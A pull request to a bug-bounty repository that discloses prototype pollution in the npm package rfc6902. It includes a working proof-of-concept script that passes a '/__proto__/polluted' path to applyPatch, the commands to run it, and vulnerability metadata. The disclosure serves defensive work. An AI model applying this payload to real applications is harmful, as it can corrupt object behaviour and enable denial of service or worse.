### PR TITLE
Prototype Pollution in rfc6902

### DIFF
--- a/bounties/npm/rfc6902/1/README.md
+++ b/bounties/npm/rfc6902/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`rfc6902` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var rfc6902 = require("rfc6902")
+var obj = {}
+console.log("Before : " + {}.polluted);
+rfc6902.applyPatch(obj, [{ op: 'add', path: "/__proto__/polluted", value: "Yes! Its Polluted"}]);
+console.log("After : " + {}.polluted);
+```
+
+2. Execute the following commands in another terminal:
+
+```bash
+npm i rfc6902 # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```

--- a/bounties/npm/rfc6902/1/vulnerability.json
+++ b/bounties/npm/rfc6902/1/vulnerability.json
@@ -51,5 +51,6 @@
     "Permalinks": [
         ""
     ],
-    "References": []
+    "References": [],
+    "PrNumber": "1222"
 }

--- a/bounties/npm/rfc6902/1/vulnerability.json
+++ b/bounties/npm/rfc6902/1/vulnerability.json
@@ -1,0 +1,55 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-11-18",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "rfc6902",
+        "URL": "https://www.npmjs.com/package/rfc6902",
+        "Downloads": "179,040"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/chbrown/rfc6902",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "chbrown",
+        "Name": "rfc6902",
+        "Forks": 26,
+        "Stars": 192
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": []
+}


### PR DESCRIPTION
`rfc6902` is vulnerable to `Prototype Pollution`.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.